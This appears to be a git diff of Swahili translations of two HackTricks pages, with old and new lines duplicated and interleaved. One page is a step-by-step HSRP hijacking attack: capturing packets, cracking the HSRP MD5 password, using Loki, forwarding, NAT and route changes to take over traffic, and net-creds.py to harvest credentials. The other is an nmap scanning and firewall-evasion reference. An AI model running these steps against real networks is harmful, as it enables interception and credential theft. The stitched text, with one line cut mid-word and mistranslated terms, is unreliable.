HSRP inakuja katika toleo mbili, HSRPv1 na HSRPv2, zikitofautiana hasa katika uwezo wa kikundi, matumizi ya IP ya multicast, na muundo wa anwani ya MAC ya kibadilika. Itifaki hutumia anwani maalum za IP za multicast kwa kubadilishana habari ya huduma, na pakiti za Hello hutumwa kila baada ya sekunde 3. Router inachukuliwa kuwa haifanyi kazi ikiwa hakuna pakiti inayopokelewa ndani ya kipindi cha sekunde 10.
|
||||
|
||||
#### Mbinu ya Shambulio la HSRP
|
||||
Shambulio la HSRP linahusisha kuchukua jukumu la Rutuba ya HSRP ya HSRP kwa kuingiza thamani ya kipaumbele ya juu kabisa. Hii inaweza kusababisha shambulio la Man-In-The-Middle (MITM). Hatua muhimu kabla ya shambulio ni kukusanya data kuhusu usanidi wa HSRP, ambayo inaweza kufanywa kwa kutumia Wireshark kwa uchambuzi wa trafiki.
|
||||
#### Mbinu ya Utekaji wa HSRP
|
||||
Mbinu za HSRP zinahusisha kuchukua jukumu la Router ya Aktivi kwa kuingiza thamani ya kipaumbele ya juu. Hii inaweza kusababisha shambulio la Man-In-The-Middle (MITM). Hatua muhimu kabla ya shambulio ni kukusanya data kuhusu usanidi wa HSRP, ambayo inaweza kufanywa kwa kutumia Wireshark kwa uchambuzi wa trafiki.
|
||||
|
||||
#### Hatua za Kupita kwa Uthibitishaji wa HSRP
|
||||
1. Hifadhi trafiki ya mtandao inayohusisha data ya HSRP kama faili ya .pcap.
|
||||
#### Hatua za Kupitisha Uthibitishaji wa HSRP
|
||||
1. Hifadhi trafiki ya mtandao inayojumuisha data ya HSRP kama faili ya .pcap.
|
||||
```shell
|
||||
tcpdump -w hsrp_traffic.pcap
|
||||
```
|
||||
2. Chambua hashi za MD5 kutoka kwenye faili ya .pcap kwa kutumia hsrp2john.py.
|
||||
2. Chambua hashi za MD5 kutoka kwa faili ya .pcap kwa kutumia hsrp2john.py.
|
||||
```shell
|
||||
python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes
|
||||
```
|
||||
|
@ -106,26 +110,26 @@ john --wordlist=mywordlist.txt hsrp_hashes
|
|||
|
||||
**Kutekeleza Uingizaji wa HSRP na Loki**
|
||||
|
||||
1. Anzisha Loki ili kutambua matangazo ya HSRP.
|
||||
2. Weka kiolesura cha mtandao kwenye hali ya promiscuous na kuwezesha IP forwarding.
|
||||
1. Anzisha Loki kutambua matangazo ya HSRP.
|
||||
2. Weka kiolesura cha mtandao kwenye hali ya kusikiliza na wezesha kusonga kwa IP.
|
||||
```shell
|
||||
sudo ip link set eth0 promisc on
|
||||
sudo sysctl -w net.ipv4.ip_forward=1
|
||||
```
|
||||
3. Tumia Loki kulenga rutuba maalum, ingiza nenosiri la HSRP lililovunjwa, na fanya usanidi unaohitajika kuiga Rutuba ya HSRP ya HSRP.
|
||||
4. Baada ya kupata jukumu la Rutuba ya HSRP ya HSRP, sanidi kiolesura chako cha mtandao na meza za IP kwa kukamata trafiki halali.
|
||||
3. Tumia Loki kulenga router maalum, ingiza nenosiri lililovunjwa la HSRP, na fanya usanidi unaohitajika kujifanya kuwa Router ya Aktivi.
|
||||
4. Baada ya kupata jukumu la Router ya Aktivi, sanidi kiolesura chako cha mtandao na meza za IP kuingilia trafiki halali.
|
||||
```shell
|
||||
sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
|
||||
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
|
||||
```
|
||||
5. Badilisha meza ya uhamishaji kuelekeza trafiki kupitia Rutuba ya HSRP ya zamani.
|
||||
5. Badilisha meza ya mwelekeo kuelekeza trafiki kupitia Router ya zamani ya Aktivi.
|
||||
```shell
|
||||
sudo route del default
|
||||
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
|
||||
```
|
||||
6. Tumia net-creds.py au zana kama hiyo kuchukua vibali kutoka kwenye trafiki iliyokamatwa.
|
||||
6. Tumia net-creds.py au zana kama hiyo kuchukua vibali kutoka kwa trafiki iliyozuiliwa.
|
||||
```shell
|
||||
sudo python2 net-creds.py -i eth0
|
||||
```
|
||||
|
||||
Kutekeleza hatua hizi humpa mshambuliaji nafasi ya kukamata na kubadilisha trafiki, kama ilivyo kwa utaratibu wa kuteka GLBP. Hii inaonyesha udhaifu katika itifaki za redundansi kama HSRP na umuhimu wa hatua madhubuti za usalama.
|
||||
Kutekeleza hatua hizi humpa mshambuliaji nafasi ya kuingilia na kudhibiti trafiki, sawa na utaratibu wa utekaji wa GLBP. Hii inaonyesha udhaifu katika itifaki za redundansi kama HSRP na haja ya hatua imara za usalama.
|
||||
|
|
|
@ -2,74 +2,94 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
```
|
||||
nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24
|
||||
```
|
||||
## Vigezo
|
||||
|
||||
### IPs za kuchunguza
|
||||
### IPs za kutafuta
|
||||
|
||||
* **`<ip>,<net/mask>`:** Inaonyesha ips moja kwa moja
|
||||
* **`-iL <ips_file>`:** orodha_IPs
|
||||
* **`-iR <number>`**: Idadi ya Ips za kubahatisha, unaweza kuepuka Ips inayowezekana na `--exclude <Ips>` au `--excludefile <file>`.
|
||||
* **`<ip>,<net/mask>`:** Inaonyesha IPs moja kwa moja
|
||||
* **`-iL <ips_file>`:** Orodha ya IPs
|
||||
* **`-iR <number>`**: Idadi ya Ips za kubahatisha, unaweza kuepuka Ips zinazowezekana kwa kutumia `--exclude <Ips>` au `--excludefile <file>`.
|
||||
|
||||
### Ugunduzi wa Vifaa
|
||||
|
||||
Kwa chaguo-msingi, Nmap huanzisha hatua ya ugunduzi inayojumuisha: `-PA80 -PS443 -PE -PP`
|
||||
Kwa chaguo-msingi, Nmap huanzisha awamu ya ugunduzi inayojumuisha: `-PA80 -PS443 -PE -PP`
|
||||
|
||||
* **`-sL`**: Sio ya uvamizi, inaorodhesha malengo kwa kufanya ombi la **DNS** kutatua majina. Ni muhimu kujua ikiwa, kwa mfano, www.prueba.es/24, Ips zote ni malengo yetu.
|
||||
* **`-Pn`**: **Hakuna ping**. Hii ni muhimu ikiwa unajua kuwa zote zinafanya kazi (ikiwa sivyo, unaweza kupoteza muda mwingi, lakini chaguo hili pia linatoa matokeo hasi yanayosema kuwa hazifanyi kazi), inazuia hatua ya ugunduzi.
|
||||
* **`-sn`** : **Hakuna uchunguzi wa bandari**. Baada ya kukamilisha hatua ya uchunguzi, haichunguzi bandari. Ni ya siri kwa kiwango fulani, na inaruhusu uchunguzi mdogo wa mtandao. Kwa ruhusa, inatuma ACK (-PA) kwa 80, SYN(-PS) kwa 443 na ombi la echo na ombi la Timestamp, bila ruhusa, daima inakamilisha uhusiano. Ikiwa lengo ni mtandao, inatumia ARP(-PR) tu. Ikitumiwa na chaguo nyingine, pakiti za chaguo nyingine tu zinatupwa.
|
||||
* **`-PR`**: **Ping ARP**. Inatumika kwa chaguo-msingi wakati wa kuchambua kompyuta kwenye mtandao wetu, ni haraka kuliko kutumia ping. Ikiwa hautaki kutumia pakiti za ARP tumia `--send-ip`.
|
||||
* **`-PS <ports>`**: Inatuma pakiti za SYN ambazo ikiwa inajibu SYN/ACK inafunguliwa (ambayo inajibu na RST ili kumaliza uhusiano), ikiwa inajibu RST inafungwa na ikiwa haipati jibu inafikika. Ikiwa huna ruhusa, uhusiano kamili hutumiwa moja kwa moja. Ikiwa hakuna bandari zinazotolewa, inatuma kwa 80.
|
||||
* **`-sL`**: Si ya kuvamia, inaorodhesha malengo kwa kutuma maombi ya **DNS** kutatua majina. Ni muhimu kujua kama kwa mfano www.prueba.es/24 IPs zote ni malengo yetu.
|
||||
* **`-Pn`**: **Hakuna ping**. Hii ni muhimu ikiwa unajua kuwa zote ziko hai (kama sivyo, unaweza kupoteza muda mwingi, lakini chaguo hili pia linazalisha matokeo hasi yakisema kuwa haziko hai), inazuia awamu ya ugunduzi.
|
||||
* **`-sn`** : **Hakuna uchunguzi wa bandari**. Baada ya kukamilisha awamu ya upelelezi, haitafuti bandari. Ni ya siri, na inaruhusu uchunguzi mdogo wa mtandao. Kwa mamlaka inatuma ACK (-PA) kwa 80, SYN(-PS) kwa 443 na ombi la echo na ombi la Timestamp, bila mamlaka daima inakamilisha uhusiano. Ikiwa lengo ni mtandao, inatumia ARP(-PR). Ikitumiwa pamoja na chaguo lingine, pakiti za chaguo lingine tu ndizo zinazotupwa.
|
||||
* **`-PR`**: **Ping ARP**. Hutumiwa kwa chaguo-msingi wakati wa kuchambua kompyuta katika mtandao wetu, ni haraka kuliko kutumia pings. Ikiwa hautaki kutumia pakiti za ARP tumia `--send-ip`.
|
||||
* **`-PS <ports>`**: Inatuma pakiti za SYN ambazo ikiitikia SYN/ACK inafunguliwa (ikiitikia na RST ili kuzuia kumaliza uhusiano), ikiitikia RST inafungwa na ikiwa haitoi jibu inafikika. Ikiwa huna mamlaka, uhusiano kamili unatumika kiotomatiki. Ikiwa hakuna bandari zimetolewa, inatuma kwa 80.
|
||||
* **`-PA <ports>`**: Kama ile ya awali lakini na ACK, kuchanganya zote mbili hutoa matokeo bora.
|
||||
* **`-PU <ports>`**: Lengo ni kinyume chake, inatumiwa kwa bandari ambazo zinatarajiwa kuwa zimefungwa. Baadhi ya firewalls huchunguza tu uhusiano wa TCP. Ikiwa imefungwa, inajibiwa na bandari isiyofikiwa, ikiwa inajibiwa na icmp nyingine au haipatiwi jibu, inabaki kama marudio yasiyofikiwa.
|
||||
* **`-PE, -PP, -PM`** : ICMP PINGS: jibu la echo, timestamp na addresmask. Inatumiwa kujua ikiwa lengo linafanya kazi.
|
||||
* **`-PY<ports>`**: Inatuma uchunguzi wa SCTP INIT kwa 80 kwa chaguo-msingi, INIT-ACK(funguliwa) au ABORT(fungwa) au hakuna kitu au ICMP isiyofikiwa(haifanyi kazi) inaweza kujibu.
|
||||
* **`-PO <protocols>`**: Itaonyesha itifaki kwenye vichwa, kwa chaguo-msingi 1(ICMP), 2(IGMP) na 4(Encap IP). Kwa itifaki za ICMP, IGMP, TCP (6) na UDP (17) vichwa vya itifaki vinatumwa, kwa zingine tu kichwa cha IP kinatumwa. Lengo la hii ni kwamba kutokana na uharibifu wa vichwa, itifaki isiyofikiwa au majibu ya itifaki hiyo hiyo yanajibiwa ili kujua ikiwa inafanya kazi.
|
||||
* **`-PU <ports>`**: Lengo ni kinyume chake, zinatumwa kwa bandari ambazo inatarajiwa kuwa zimefungwa. Baadhi ya firewalls huchunguza tu uhusiano wa TCP. Ikiwa imefungwa inajibiwa na bandari isiyopatikana, ikiitikia na icmp nyingine au ikiwa haitoi jibu inabaki kama isiyopatikana.
|
||||
* **`-PE, -PP, -PM`** : ICMP PINGS: jibu la echo, timestamp na addresmask. Zinatumiwa kujua ikiwa lengo lipo hai.
|
||||
* **`-PY<ports>`**: Inatuma uchunguzi wa SCTP INIT kwa 80 kwa chaguo-msingi, INIT-ACK(funguliwa) au ABORT(fungwa) au hakuna kitu au ICMP isiyopatikana(isiyofanya kazi) inaweza kujibiwa.
|
||||
* **`-PO <protocols>`**: Itifaki inaonyeshwa kwenye vichwa, kwa chaguo-msingi 1(ICMP), 2(IGMP) na 4(Encap IP). Kwa itifaki za ICMP, IGMP, TCP (6) na UDP (17) vichwa vya itifaki vinatumwa, kwa zingine ni kichwa cha IP tu kinatumwa. Lengo la hii ni kwamba kutokana na uharibifu wa vichwa, itifaki isiyopatikana au majibu ya itifaki hiyo hiyo yanajibiwa kujua ikiwa iko juu.
|
||||
* **`-n`**: Hakuna DNS
|
||||
* **`-R`**: DNS daima
|
||||
|
||||
### Mbinu za uchunguzi wa bandari
|
||||
### Mbinu za Uchunguzi wa Bandari
|
||||
|
||||
* **`-sS`**: Haikamilishi uhusiano hivyo haileti ushahidi, nzuri sana ikiwa inaweza kutumika. (ruhusa) Hii ndiyo inayotumiwa kwa chaguo-msingi.
|
||||
* **`-sT`**: Inakamilisha uhusiano, kwa hivyo inaacha ushahidi, lakini inaweza kutumika kwa uhakika. Kwa chaguo-msingi bila ruhusa.
|
||||
* **`-sU`**: Polepole, kwa UDP. Kwa kawaida: DNS(53), SNMP(161,162), DHCP(67 na 68), (-sU53,161,162,67,68): funguliwa(majibu), fungwa(isiyofikiwa kwa bandari), kuchujwa (icmp nyingine), funguliwa/kuchujwa (hakuna kitu). Ikiwa ni funguliwa/kuchujwa, -sV inatuma maombi mengi kugundua mojawapo ya toleo ambazo nmap inasaidia na inaweza kugundua hali halisi. Inaongeza sana wakati.
|
||||
* **`-sY`**: Itifaki ya SCTP haiwezi kuanzisha uhusiano, kwa hivyo hakuna kumbukumbu, inafanya kazi kama -PY
|
||||
* **`-sN,-sX,-sF`:** Null, Fin, Xmas, wanaweza kuingia kwenye baadhi ya firewalls na kutoa habari. Wanategemea ukweli kwamba mashine zinazofuata viwango zinapaswa kujibu na RST maombi yote ambayo hayana SYN, RST au ACK: funguliwa/kuchujwa(hakuna kitu), fungwa(RST), kuchujwa (ICMP isiyofikiwa). Sio ya kuaminika kwenye Windows, CIsco, BSDI na OS/400. Kwenye unix ndio.
|
||||
* **`-sM`**: Uchunguzi wa Maimon: Inatuma alama za FIN na ACK, hutumiwa kwa BSD, kwa sasa itarudi zote kama zimefungwa.
|
||||
* **`-sA, sW`**: ACK na Window, hutumiwa kugundua firewalls, kujua ikiwa bandari zimechujwa au la. -sW inatofautisha kati ya funguliwa/kufungwa kwani zile zilizofunguliwa zinajibu na thamani tofauti ya dirisha: funguliwa (RST na dirisha tofauti na 0), fungwa (RST dirisha = 0), kuchujwa (ICMP isiyofikiwa au hakuna kitu). Sio kompyuta zote zinafanya kazi kwa njia hii, kwa hivyo ikiwa zote zimefungwa, haifanyi kazi, ikiwa chache zimefunguliwa, inafanya kazi vizuri, na ikiwa nyingi zimefunguliwa na chache zimefungwa, inafanya kazi kinyume chake.
|
||||
* **`-sI`:** Uchunguzi wa hali ya utulivu. Kwa kesi ambapo kuna firewall inayofanya k
|
||||
**--osscan-guess** Wakati ugunduzi wa mfumo wa uendeshaji sio kamili, hii inafanya kazi ngumu zaidi
|
||||
* **`-sS`**: Haukamilishi uhusiano hivyo haionyeshi alama, nzuri sana ikiwa inaweza kutumika. (mamlaka) Ni ile inayotumiwa kwa chaguo-msingi.
|
||||
* **`-sT`**: Inakamilisha uhusiano, hivyo inaacha alama, lakini inaweza kutumika kwa uhakika. Kwa chaguo-msingi bila mamlaka.
|
||||
* **`-sU`**: Polepole, kwa UDP. Kwa kiasi kikubwa: DNS(53), SNMP(161,162), DHCP(67 na 68), (-sU53,161,162,67,68): wazi(jibu), imefungwa(bandari isiyopatikana), iliyofutwa (icmp nyingine), wazi/imefungwa (hakuna kitu). Kwa hali ya wazi/imefungwa, -sV inatuma maombi mengi kugundua mojawapo ya toleo ambazo nmap inasaidia na inaweza kugundua hali halisi. Inaongeza sana muda.
|
||||
* **`-sY`**: Itifaki ya SCTP haiwezi kuanzisha uhusiano, hivyo hakuna kumbukumbu, inafanya kazi kama -PY
|
||||
* **`-sN,-sX,-sF`:** Null, Fin, Xmas, wanaweza kuingia kwenye baadhi ya firewalls na kutoa habari. Zinategemea ukweli kwamba mashine zinazofuata viwango zinapaswa kujibu na RST maombi yote ambayo hayana SYN, RST au ACK zilizoinuliwa: wazi/imefungwa(hakuna kitu), imefungwa(RST), iliyofutwa (icmp isiyopatikana). Sio za kuaminika kwenye Windows, CIsco, BSDI na OS/400. Kwenye unix ndio.
|
||||
* **`-sM`**: Uchunguzi wa Maimon: Inatuma alama za FIN na ACK, hutumiwa kwa BSD, kwa sasa itarudisha zote kama imefungwa.
|
||||
* **`-sA, sW`**: ACK na Window, hutumiwa kugundua firewalls, kujua ikiwa bandari zimezuiwa au la. -sW inatofautisha kati ya wazi/imefungwa kwani zile zilizofunguliwa zinajibu na thamani tofauti ya dirisha: wazi (RST na dirisha tofauti na 0), imefungwa (RST dirisha = 0), iliyofutwa (icmp isiyopatikana au hakuna kitu). Sio kompyuta zote zinafanya kazi kwa njia hii, hivyo ikiwa zote zimefungwa, haifanyi kazi, ikiwa ni chache zilizofunguliwa, inafanya kazi vizuri, na ikiwa ni nyingi zilizofunguliwa na chache zilizofungwa, inafanya kazi kinyume.
|
||||
* **`-sI`:** Uchunguzi wa Kimya. Kwa kesi ambapo kuna firewall inayofanya kazi lakini tunajua kuwa haitazi Ip fulani (au tunapotaka tu kutokuwa na jina) tunaweza kutumia skana ya zombie (inatumika kwa bandari zote), kutafuta zombies inayowezekana tunaweza kutumia skrini ya ipidseq au kisasa cha kudanganya/scanner/ip/ipidseq. Skana hii inategemea nambari ya IPID ya pakiti za IP.
|
||||
* **`--badsum`:** Inatuma jumla isiyo sahihi, kompyuta zingeweza kukataa pakiti, lakini firewalls zingeweza kujibu kitu, hutumiwa kugundua firewalls.
|
||||
* **`-sZ`:** Skana ya SCTP "Weird", wakati wa kutuma uchunguzi na vipande vya cookie echo vinapaswa kutupwa ikiwa ni wazi au kujibiwa na ABORT ikiwa imefungwa. Inaweza kupita kwenye firewalls ambazo init haitapita, baya ni kwamba haitofautishi kati ya zilizofunguliwa na zilizozuiliwa.
|
||||
* **`-sO`:** Uchunguzi wa Itifaki ya Ip. Inatuma vichwa vibaya na tupu ambapo mara nyingine hata itifaki haiwezi kutofautishwa. Ikiwa itifaki isiyopatikana ya ICMP inawasili inafungwa, ikiwa bandari isiyopatikana inawasili inafunguliwa, ikiwa kosa lingine linawasili, zilizozuiliwa, ikiwa hakuna kitu kinawasili, wazi|zilizozuiliwa.
|
||||
* **`-b <server>`:** FTPhost--> Hutumiwa kutafuta mwenyeji kutoka kwa mwingine, hii inafanywa kwa kuunganisha ftp ya mashine nyingine na kuomba kutuma faili kwa bandari unazotaka kutafuta kutoka kwa mashine nyingine, kulingana na majibu tutajua ikiwa zimefunguliwa au la. \[\<user>:\<password>@]\<server>\[:\<port>] Karibu seva zote za ftp haziruhusu tena kufanya hivi na kwa hivyo ni ya matumizi kidogo.
|
||||
|
||||
### **Kati ya Uchambuzi**
|
||||
|
||||
**-p:** Inatumika kutoa bandari za kutafuta. Kuchagua 65335: **-p-** au **-p all**. Nmap ina uainishaji wa ndani kulingana na umaarufu wake. Kwa chaguo-msingi hutumia 1000 kuu. Kwa **-F** (uchunguzi wa haraka) huchunguza 100 kuu. Kwa **--top-ports \<numero>** Huchunguza idadi hiyo ya kuu (kutoka 1 hadi 65335). Inathibitisha bandari kwa mpangilio wa nasibu, ili hilo lisitoke **-r**. Pia tunaweza kuchagua bandari: 20-30,80,443,1024- Hii ya mwisho inamaanisha kuangalia mbele ya 1024. Pia tunaweza kugawa bandari kwa itifaki: U:53,T:21-25,80,139,S:9. Pia tunaweza kuchagua kikundi cha bandari ndani ya kuu za nmap: -p \[-1024] huchunguza hadi 1024 zilizomo kwenye huduma za nmap. **--port-ratio \<ratio>** Huchunguza bandari za kawaida zaidi kuliko uwiano ambao lazima uwe kati ya 0 na 1
|
||||
|
||||
**-sV** Uchunguzi wa toleo, unaweza kudhibiti ukali kutoka 0 hadi 9, kwa chaguo-msingi 7.
|
||||
|
||||
**--version-intensity \<numero>** Tunadhibiti ukali, hivyo kadri chini itatuma tu majaribio yanayowezekana zaidi, lakini sio yote. Hii inaweza kupunguza sana muda wa uchunguzi wa UDP
|
||||
|
||||
**-O** Ugunduzi wa OS
|
||||
|
||||
**--osscan-limit** Ili kuchunguza mwenyeji vizuri inahitajika kuwa angalau bandari 1 iko wazi na nyingine imefungwa, ikiwa hali hii haipo na tumeiweka hii, haitajaribu kutabiri OS (inapunguza muda)
|
||||
**--osscan-guess** Wakati upelelezi wa mfumo wa uendeshaji si kamili hii inafanya iwe ngumu zaidi
|
||||
|
||||
**Scripts**
|
||||
|
||||
\--script _\<filename>_|_\<category>_|_\<directory>_|_\<expression>_\[,...]
|
||||
\--script _\<jina la faili>_|_\<jamii>_|_\<directory>_|_\<expression>_\[,...]
|
||||
|
||||
Kutumia default, tumia -sC au --script=default
|
||||
Kutumia zile za msingi, tumia -sC au --script=default
|
||||
|
||||
Aina za script ni: auth, broadcast, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, na vuln
|
||||
Aina zilizopo ni: auth, broadcast, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, na vuln
|
||||
|
||||
* **Auth:** inatekeleza scripts zote zinazopatikana kwa uthibitishaji
|
||||
* **Default:** inatekeleza scripts msingi wa chombo
|
||||
* **Discovery:** hupata habari kuhusu lengo au mwathirika
|
||||
* **External:** script ya kutumia rasilimali za nje
|
||||
* **Intrusive:** hutumia scripts ambazo zinachukuliwa kuwa za kuvamia kwa mwathirika au lengo
|
||||
* **Malware:** inachunguza ikiwa kuna uhusiano uliofunguliwa na programu hasidi au mlango wa nyuma
|
||||
* **Safe:** inatekeleza scripts ambazo sio za kuvamia
|
||||
* **Vuln:** hupata udhaifu maarufu
|
||||
* **All:** inatekeleza scripts zote za NSE zilizopo
|
||||
* **Auth:** hutekeleza zote zilizopo kwa uthibitisho
|
||||
* **Default:** hutekeleza zile za msingi za zana
|
||||
* **Discovery:** hupata taarifa kuhusu lengo au mhanga
|
||||
* **External:** script kwa kutumia rasilimali za nje
|
||||
* **Intrusive:** hutumia script zinazochukuliwa kuwa za kuvamia kwa lengo au mhanga
|
||||
* **Malware:** huchunguza kama kuna uhusiano wa wazi kwa nambari za hasidi au _backdoors_
|
||||
* **Safe:** hutekeleza script ambazo si za kuvamia
|
||||
* **Vuln:** hufunua mapungufu maarufu zaidi
|
||||
* **All:** hutekeleza kikamilifu script zote za NSE zilizopo
|
||||
|
||||
Kutafuta scripts:
|
||||
|
||||
|
@ -85,68 +105,88 @@ Kutafuta scripts:
|
|||
|
||||
\--script-args _\<n1>_=_\<v1>_,_\<n2>_={_\<n3>_=_\<v3>_},_\<n4>_={_\<v4>_,_\<v5>_}
|
||||
|
||||
\--script-args-file _\<filename>_
|
||||
\--script-args-file _\<jina la faili>_
|
||||
|
||||
\--script-help _\<filename>_|_\<category>_|_\<directory>_|_\<expression>_|all\[,...]
|
||||
\--script-help _\<jina la faili>_|_\<jamii>_|_\<directory>_|_\<expression>_|all\[,...]
|
||||
|
||||
\--script-trace ---> Inatoa habari juu ya jinsi script inavyofanya kazi
|
||||
\--script-trace ---> Inatoa habari kuhusu jinsi script inavyoendelea
|
||||
|
||||
\--script-updatedb
|
||||
|
||||
Kutumia script, tuweke: nmap --script Jina\_la\_script lengo --> Kwa kuweka script, script na skana zitatekelezwa, kwa hivyo pia tunaweza kuongeza **"safe=1"** ili kutekeleza tu zile salama.
|
||||
**Kutumia script pekee, weka: nmap --script Jina\_la\_script lengo** --> Kwa kuweka script, script na skana zitatekelezwa, hivyo pia unaweza kuongeza **“safe=1”** ili zitekelezwe tu zile salama.
|
||||
|
||||
Kudhibiti wakati
|
||||
**Kudhibiti Wakati**
|
||||
|
||||
Nmap inaweza kubadilisha wakati kwa sekunde, dakika, ms: --host-timeout arguments 900000ms, 900, 900s, na 15m yote yanafanya kitu kimoja.
|
||||
**Nmap inaweza kurekebisha wakati kwa sekunde, dakika, ms:** --host-timeout arguments 900000ms, 900, 900s, na 15m yote yanafanya kitu kimoja.
|
||||
|
||||
Nmap inagawanya idadi ya jumla ya vifaa vya kuchunguza katika vikundi na kuchambua vikundi hivyo kwa mafungu hadi vifaa vyote havijachunguzwa (na mtumiaji pia haupokei sasisho lolote hadi kifungu kimechunguzwa). Kwa njia hii, ni bora kwa nmap kutumia vikundi vikubwa. Kwa chaguo-msingi, inatumia 256 katika darasa C.
|
||||
Nmap huchukua idadi ya jumla ya vifaa vya kuchunguza na kugawanya katika vikundi na kuchambua vikundi hivyo kwa mafungu ili mpaka vyote vimechambuliwa, haitapita kwa kikundi kinachofuata (na mtumiaji pia hataki kupokea sasisho mpaka kikundi kimechambuliwa) kwa njia hii, ni bora kwa nmap kutumia vikundi vikubwa. Kwa msingi, inatumia 256 katika darasa C.
|
||||
|
||||
Inaweza kubadilishwa na **--min-hostgroup** _**\<numhosts>**_**;** **--max-hostgroup** _**\<numhosts>**_ (Badilisha ukubwa wa vikundi vya uchunguzi wa wakati mmoja)
|
||||
Inaweza kubadilishwa na\*\*--min-hostgroup\*\* _**\<numhosts>**_**;** **--max-hostgroup** _**\<numhosts>**_ (Kurekebisha ukubwa wa vikundi vya uchunguzi wa pamoja)
|
||||
|
||||
Inaweza kudhibiti idadi ya skana za wakati mmoja lakini ni bora kutofanya hivyo (nmap tayari ina udhibiti wa moja kwa moja kulingana na hali ya mtandao): **--min-parallelism** _**\<numprobes>**_**;** **--max-parallelism** _**\<numprobes>**_
|
||||
Inaweza kudhibiti idadi ya skana kwa pamoja lakini ni bora kutofanya hivyo (nmap tayari ina udhibiti wa moja kwa moja kulingana na hali ya mtandao): **--min-parallelism** _**\<numprobes>**_**;** **--max-parallelism** _**\<numprobes>**_
|
||||
|
||||
Tunaweza kubadilisha rtt timeout, lakini kawaida sio lazima: **--min-rtt-timeout** _**\<time>**_**,** **--max-rtt-timeout** _**\<time>**_**,** **--initial-rtt-timeout** _**\<time>**_
|
||||
Tunaweza kurekebisha rtt timeout, lakini mara nyingi si lazima: **--min-rtt-timeout** _**\<time>**_**,** **--max-rtt-timeout** _**\<time>**_**,** **--initial-rtt-timeout** _**\<time>**_
|
||||
|
||||
Tunaweza kubadilisha idadi ya majaribio: **--max-retries** _**\<numtries>**_
|
||||
Tunaweza kurekebisha idadi ya majaribio:**--max-retries** _**\<numtries>**_
|
||||
|
||||
Tunaweza kubadilisha wakati wa kuchunguza kifaa: **--host-timeout** _**\<time>**_
|
||||
Tunaweza kurekebisha wakati wa kuchunguza kifaa: **--host-timeout** _**\<time>**_
|
||||
|
||||
Tunaweza kubadilisha wakati kati ya kila jaribio ili iwe polepole: **--scan-delay** _**\<time>**_**;** **--max-scan-delay** _**\<time>**_
|
||||
Tunaweza kurekebisha wakati kati ya kila jaribio ili liende polepole: **--scan-delay** _**\<time>**_**;** **--max-scan-delay** _**\<time>**_
|
||||
|
||||
Tunaweza kubadilisha idadi ya pakiti kwa sekunde: **--min-rate** _**\<number>**_**;** **--max-rate** _**\<number>**_
|
||||
Tunaweza kurekebisha idadi ya pakiti kwa sekunde: **--min-rate** _**\<number>**_**;** **--max-rate** _**\<number>**_
|
||||
|
||||
Baadhi ya bandari huchukua muda mrefu kujibu wakati zimezuiwa au zimefungwa, ikiwa tunahitaji tu zile zilizofunguliwa, tunaweza kuwa haraka na: **--defeat-rst-ratelimit**
|
||||
Baadhi ya bandari huchukua muda mrefu kujibu kwa kuwa zimezuiwa au zimefungwa, ikiwa tunataka tu zile zilizo wazi, tunaweza kwenda haraka zaidi na: **--defeat-rst-ratelimit**
|
||||
|
||||
Kuongeza nguvu ya nmap: -T paranoid|sneaky|polite|normal|aggressive|insane
|
||||
Kuamua jinsi kali tunavyotaka nmap iwe: -T paranoid|sneaky|polite|normal|aggressive|insane
|
||||
|
||||
\-T (0-1)
|
||||
|
||||
\-T0 --> Inachunguza bandari 1 kwa wakati na inasubiri dakika 5 kabla ya kuanza ya pili
|
||||
